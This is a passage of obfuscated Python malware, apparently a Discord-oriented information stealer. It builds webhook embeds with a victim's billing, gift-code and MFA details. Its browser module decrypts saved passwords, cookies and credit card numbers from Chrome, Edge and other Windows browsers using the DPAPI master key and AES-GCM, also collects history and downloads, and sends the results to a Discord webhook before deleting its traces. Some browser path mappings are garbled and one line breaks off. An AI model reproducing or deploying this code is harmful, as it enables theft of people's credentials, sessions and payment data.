            embed.add_field(name=':earth_africa: Language:', value=f'```{XQWVYWRBAAEERRYTGPOOJZACQMEELSHQLZQGGGLDGKOMAJHLOEYGJLWLSLGBFRLUUA}```', inline=True)
            embed.add_field(name=':moneybag: Billing:', value=f'```{LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX}```', inline=True)
            embed.add_field(name=':gift: Gift Code:', value=f'```{RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT}```', inline=True)
            embed.add_field(name=':lock: Multi-Factor Authentication:', value=f'```{AFLIMDMTYTUZRFTHTTDIVWGPKDHSVEDTTLLRBTTYHADYFROZBUNFKGZIJCH}```', inline=True)
            embed.add_field(name=':frame_photo: Profile Picture:', value=f'', inline=False)
            embed.set_image(url=JMYKVYMGIPCIKAOEIXFQSWUYAOVJNHHQMLKNSZISJRSGZKLZTMAAMHUXKCSFNKFRMAHVMKEG)
            embed.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=embed, username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
    upload_t0k3n5()

def Br0w53r_5t341():
    import os
    import shutil
    import json
    import base64
    import sqlite3
    import win32crypt
    from zipfile import ZipFile
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from discord import SyncWebhook, Embed, File
    from pathlib import Path
    VTHEUWQQAJDITJZITDJOVRYYKEFAGERDRAZVGJLCHOREJNIJXLVJFGOCXVAGVDS = []
    QNZOANVSNOAGBLVCVFLWADTRZYHVOJCWCVKSUASGUGDBCRXJOXTZMPKGPBJPQHVIWGTETTRUNPFOEDJWXEAYLNBHCPFOVE = []
    DDTZHSORUXVPPBXBJMIEUNPXBWTCPWEGZWIMONPTYRXVZZKWVALCLBBMHZFYDRPNGHYNQATIHRFTNOLFJSLP = []
    JNYEYHDZYWFQKFBJLYBUJTUGLLPHXBJBXXKMYOMAYFFXBLUIFBGNUDEDUXWMOJLHSUEJGNJTIOSLOXYAZGRLCFYCVU = []
    QBSVPSWALXQAFSPBNEHOTGYLCXWKSTKPMPZFQGGLTYFLALFICCYQQFKFALLPNZZJIDQOLZGVBMZPQXBQVJDWCNQEAFNYIYY = []
    NECYVLUOJQRMTZQCVNHKICFBSHRCKJSIGTMYWCMCXVOSETRKVBXLZFOXBX = []

    def Br0ws53r_Main():
        FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT = os.getenv('LOCALAPPDATA')
        BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB = os.getenv('APPDATA')
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
        Mozilla = {'Google Chrome': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Google', 'Chrome', 'User Data'), 'Microsoft Edge': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Microsoft', 'Edge', 'User Data'), 'Opera': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Microsoft', 'Brave-Browser', 'User Data'), 'Vivaldi': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Vivaldi', 'User Data'), 'Vivaldi': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Vivaldi', 'User Data'), 'Google Chrome SxS': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Google', 'Chrome SxS', 'User Data'), 'Epic Privacy Browser': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Iridium', 'User Data'), 'Mozilla Firefox': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Apple Computer', 'Safari'), 'Mozilla Firefox': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, 'Safari', 'Mozilla Firefox', 'User Data'), 'HUCBKVSETSLRTDVLJZWVMETRBKBTHOURGOHILQYPPUGSWIQGIVRYWEHNCMJWR': os.path.join(FCCBTXLDLZZZVJDWUAXKDFCGATCQXKESEAURRQHTTYJFQWPVMOFJTWXQNVT, '
        GCZSYKLTCGXYDFATLTZTLAYFWSCZGXSKAPRZYEAWXEYAVBGZANSHEJGWNGXGQEVHAFPWFMA = ['', 'Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5']
        for NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN in HUCBKVSETSLRTDVLJZWVMETRBKBTHOURGOHILQYPPUGSWIQGIVRYWEHNCMJWR.items():
            if not os.path.exists(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
                continue
            OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC = get_master_key(os.path.join(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, 'Local State'))
            if not OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC:
                continue
            for v4r_profile in GCZSYKLTCGXYDFATLTZTLAYFWSCZGXSKAPRZYEAWXEYAVBGZANSHEJGWNGXGQEVHAFPWFMA:
                QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI = os.path.join(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, v4r_profile)
                if not os.path.exists(QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI):
                    continue
                get_passwords(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC)
                get_cookies(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC)
                get_history(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI)
                get_downloads(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI)
                get_cards(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC)
                if NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC not in NECYVLUOJQRMTZQCVNHKICFBSHRCKJSIGTMYWCMCXVOSETRKVBXLZFOXBX:
                    NECYVLUOJQRMTZQCVNHKICFBSHRCKJSIGTMYWCMCXVOSETRKVBXLZFOXBX.append(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC)
        write_files(POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR)
        send_files(POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR, HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW)
        clean_files(POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR)

    def get_master_key(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
        if not os.path.exists(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
            return
        try:
            with open(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, 'r', encoding='utf-8') as v4r_f:
                v4r_local_state = json.load(v4r_f)
            KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_key = base64.b64decode(v4r_local_state['os_crypt']['encrypted_key'])[5:]
            OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC = win32crypt.CryptUnprotectData(KFHORBXMVBGSEKHICBQCURZHAPITRQISNSZHUILAFIVOYSLTRLQMDHPDUVGIBBOOFNQZJKKOCYJJGVBVBFYNLPWKTLYLJXFBMOMO_key, None, None, None, 0)[1]
            return OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC
        except:
            return None

    def decrypt_password(OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC):
        try:
            v4r_iv = OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL[3:15]
            v4r_payload = OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL[15:(-16)]
            v4r_tag = OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL[(-16):]
            v4r_cipher = Cipher(algorithms.AES(OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC), modes.GCM(v4r_iv, v4r_tag))
            v4r_decryptor = v4r_cipher.decryptor()
            v4r_decrypted_pass = v4r_decryptor.update(v4r_payload) + v4r_decryptor.finalize()
            return v4r_decrypted_pass.decode()
        except:
            return None

    def list_tables(OTALLYVRWZIRQKMPFSNBFIPPIQXSYCMRXENSUQSKYYXHTGJSKRHRJWBIVWIOOV):
        try:
            v4r_conn = sqlite3.connect(OTALLYVRWZIRQKMPFSNBFIPPIQXSYCMRXENSUQSKYYXHTGJSKRHRJWBIVWIOOV)
            v4r_cursor = v4r_conn.cursor()
            v4r_cursor.execute('SELECT name FROM sqlite_master WHERE type=\'table\';')
            v4r_tables = v4r_cursor.fetchall()
            v4r_conn.close()
            return v4r_tables
        except:
            return []

    def get_passwords(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC):
        v4r_password_db = os.path.join(QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, 'Login Data')
        if not os.path.exists(v4r_password_db):
            return
        shutil.copy(v4r_password_db, 'password_db')
        v4r_tables = list_tables('password_db')
        v4r_conn = sqlite3.connect('password_db')
        v4r_cursor = v4r_conn.cursor()
        try:
            v4r_cursor.execute('SELECT action_url, username_value, password_value FROM logins')
            VTHEUWQQAJDITJZITDJOVRYYKEFAGERDRAZVGJLCHOREJNIJXLVJFGOCXVAGVDS.append(f'\n------------------------------| {NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC} ({XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}) |------------------------------\n')
            for v4r_row in v4r_cursor.fetchall():
                if not v4r_row[0] or not v4r_row[1] or (not v4r_row[2]):
                    continue
                v4r_url = f'- Url      : {v4r_row[0]}'
                v4r_username = f'  Username : {v4r_row[1]}'
                v4r_password = f'  Password : {decrypt_password(v4r_row[2], OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC)}'
                VTHEUWQQAJDITJZITDJOVRYYKEFAGERDRAZVGJLCHOREJNIJXLVJFGOCXVAGVDS.append(f'{v4r_url}\n{v4r_username}\n{v4r_password}\n')
        except:
            return
        finally:  # inserted
            v4r_conn.close()
            os.remove('password_db')

    def get_cookies(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC):
        v4r_cookie_db = os.path.join(QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, 'Network', 'Cookies')
        if not os.path.exists(v4r_cookie_db):
            return
        v4r_conn = None
        try:
            try:
                shutil.copy(v4r_cookie_db, 'cookie_db')
                v4r_conn = sqlite3.connect('cookie_db')
                v4r_cursor = v4r_conn.cursor()
                v4r_cursor.execute('SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies')
                QNZOANVSNOAGBLVCVFLWADTRZYHVOJCWCVKSUASGUGDBCRXJOXTZMPKGPBJPQHVIWGTETTRUNPFOEDJWXEAYLNBHCPFOVE.append(f'\n------------------------------| {NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC} ({XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}) |------------------------------\n')
                for v4r_row in v4r_cursor.fetchall():
                    if not v4r_row[0] or not v4r_row[1] or (not v4r_row[2]) or (not v4r_row[3]):
                        continue
                    v4r_url = f'- Url    : {v4r_row[0]}'
                    PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS = f'  Name   : {v4r_row[1]}'
                    XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN = f'  Path   : {v4r_row[2]}'
                    v4r_cookie = f'  Cookie : {decrypt_password(v4r_row[3], OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC)}'
                    v4r_expire = f'  Expire : {v4r_row[4]}'
                    QNZOANVSNOAGBLVCVFLWADTRZYHVOJCWCVKSUASGUGDBCRXJOXTZMPKGPBJPQHVIWGTETTRUNPFOEDJWXEAYLNBHCPFOVE.append(f'{v4r_url}\n{PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS}\n{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\n{v4r_cookie}\n{v4r_expire}\n')
            except:
                pass
        finally:  # inserted
            if v4r_conn:
                v4r_conn.close()
            try:
                os.remove('cookie_db')
            except:
                return

    def get_history(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI):
        v4r_history_db = os.path.join(QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, 'History')
        if not os.path.exists(v4r_history_db):
            return
        shutil.copy(v4r_history_db, 'history_db')
        v4r_conn = sqlite3.connect('history_db')
        v4r_cursor = v4r_conn.cursor()
        v4r_cursor.execute('SELECT url, title, last_visit_time FROM urls')
        DDTZHSORUXVPPBXBJMIEUNPXBWTCPWEGZWIMONPTYRXVZZKWVALCLBBMHZFYDRPNGHYNQATIHRFTNOLFJSLP.append(f'\n------------------------------| {NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC} ({XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}) |------------------------------\n')
        for v4r_row in v4r_cursor.fetchall():
            if not v4r_row[0] or not v4r_row[1] or (not v4r_row[2]):
                continue
            v4r_url = f'- Url   : {v4r_row[0]}'
            v4r_title = f'  Title : {v4r_row[1]}'
            v4r_time = f'  Time  : {v4r_row[2]}'
            DDTZHSORUXVPPBXBJMIEUNPXBWTCPWEGZWIMONPTYRXVZZKWVALCLBBMHZFYDRPNGHYNQATIHRFTNOLFJSLP.append(f'{v4r_url}\n{v4r_title}\n{v4r_time}\n')
        v4r_conn.close()
        os.remove('history_db')

    def get_downloads(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI):
        v4r_downloads_db = os.path.join(QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, 'History')
        if not os.path.exists(v4r_downloads_db):
            return
        shutil.copy(v4r_downloads_db, 'downloads_db')
        v4r_conn = sqlite3.connect('downloads_db')
        v4r_cursor = v4r_conn.cursor()
        v4r_cursor.execute('SELECT tab_url, target_path FROM downloads')
        JNYEYHDZYWFQKFBJLYBUJTUGLLPHXBJBXXKMYOMAYFFXBLUIFBGNUDEDUXWMOJLHSUEJGNJTIOSLOXYAZGRLCFYCVU.append(f'\n------------------------------| {NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC} ({XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}) |------------------------------\n')
        for row in v4r_cursor.fetchall():
            if not row[0] or not row[1]:
                continue
            XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN = f'- Path : {row[1]}'
            v4r_url = f'  Url  : {row[0]}'
            JNYEYHDZYWFQKFBJLYBUJTUGLLPHXBJBXXKMYOMAYFFXBLUIFBGNUDEDUXWMOJLHSUEJGNJTIOSLOXYAZGRLCFYCVU.append(f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\n{v4r_url}\n')
        v4r_conn.close()
        os.remove('downloads_db')

    def get_cards(NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC):
        v4r_cards_db = os.path.join(QCELRAFEPRBUKBKYDQUQVHPMFOYDVRLJPUWSRVSPDCBTBVXUPYSZFNUNVGVBYHXMFWIQBQJWGMHBZXSVYUUIUFVMXDQHI, 'Web Data')
        if not os.path.exists(v4r_cards_db):
            return
        shutil.copy(v4r_cards_db, 'cards_db')
        v4r_conn = sqlite3.connect('cards_db')
        v4r_cursor = v4r_conn.cursor()
        v4r_cursor.execute('SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')
        QBSVPSWALXQAFSPBNEHOTGYLCXWKSTKPMPZFQGGLTYFLALFICCYQQFKFALLPNZZJIDQOLZGVBMZPQXBQVJDWCNQEAFNYIYY.append(f'\n------------------------------| {NGCAIAYDEYCHUMHLTLTIQMEKTDYKOITBKFWAHHCPOBWWYGLZXPVPAHLQJKBQDLDC} ({XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}) |------------------------------\n')
        for v4r_row in v4r_cursor.fetchall():
            if not v4r_row[0] or not v4r_row[1] or (not v4r_row[2]) or (not v4r_row[3]):
                continue
            PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS = f'- Name             : {v4r_row[0]}'
            v4r_expiration_month = f'  Expiration Month : {v4r_row[1]}'
            v4r_expiration_year = f'  Expiration Year  : {v4r_row[2]}'
            v4r_card_number = f'  Card Number      : {decrypt_password(v4r_row[3], OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC)}'
            v4r_date_modified = f'  Date Modified    : {v4r_row[4]}'
            QBSVPSWALXQAFSPBNEHOTGYLCXWKSTKPMPZFQGGLTYFLALFICCYQQFKFALLPNZZJIDQOLZGVBMZPQXBQVJDWCNQEAFNYIYY.append(f'{PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS}\n{v4r_expiration_month}\n{v4r_expiration_year}\n{v4r_card_number}\n{v4r_date_modified}\n')
        v4r_conn.close()
        os.remove('cards_db')

    def write_files(POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR):
        os.makedirs(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}', exist_ok=True)
        if VTHEUWQQAJDITJZITDJOVRYYKEFAGERDRAZVGJLCHOREJNIJXLVJFGOCXVAGVDS:
            with open(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}\\Passwords_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.txt', 'w', encoding='utf-8') as f:
                f.write('\n'.join(VTHEUWQQAJDITJZITDJOVRYYKEFAGERDRAZVGJLCHOREJNIJXLVJFGOCXVAGVDS))
        if QNZOANVSNOAGBLVCVFLWADTRZYHVOJCWCVKSUASGUGDBCRXJOXTZMPKGPBJPQHVIWGTETTRUNPFOEDJWXEAYLNBHCPFOVE:
            with open(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}\\Cookies_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.txt', 'w', encoding='utf-8') as f:
                f.write('\n'.join(QNZOANVSNOAGBLVCVFLWADTRZYHVOJCWCVKSUASGUGDBCRXJOXTZMPKGPBJPQHVIWGTETTRUNPFOEDJWXEAYLNBHCPFOVE))
        if DDTZHSORUXVPPBXBJMIEUNPXBWTCPWEGZWIMONPTYRXVZZKWVALCLBBMHZFYDRPNGHYNQATIHRFTNOLFJSLP:
            with open(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}\\History_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.txt', 'w', encoding='utf-8') as f:
                f.write('\n'.join(DDTZHSORUXVPPBXBJMIEUNPXBWTCPWEGZWIMONPTYRXVZZKWVALCLBBMHZFYDRPNGHYNQATIHRFTNOLFJSLP))
        if JNYEYHDZYWFQKFBJLYBUJTUGLLPHXBJBXXKMYOMAYFFXBLUIFBGNUDEDUXWMOJLHSUEJGNJTIOSLOXYAZGRLCFYCVU:
            with open(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}\\Downloads_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.txt', 'w', encoding='utf-8') as f:
                f.write('\n'.join(JNYEYHDZYWFQKFBJLYBUJTUGLLPHXBJBXXKMYOMAYFFXBLUIFBGNUDEDUXWMOJLHSUEJGNJTIOSLOXYAZGRLCFYCVU))
        if QBSVPSWALXQAFSPBNEHOTGYLCXWKSTKPMPZFQGGLTYFLALFICCYQQFKFALLPNZZJIDQOLZGVBMZPQXBQVJDWCNQEAFNYIYY:
            with open(f'Browser_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}\\Cards_{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR}.txt', 'w', encoding='utf-8') as f:
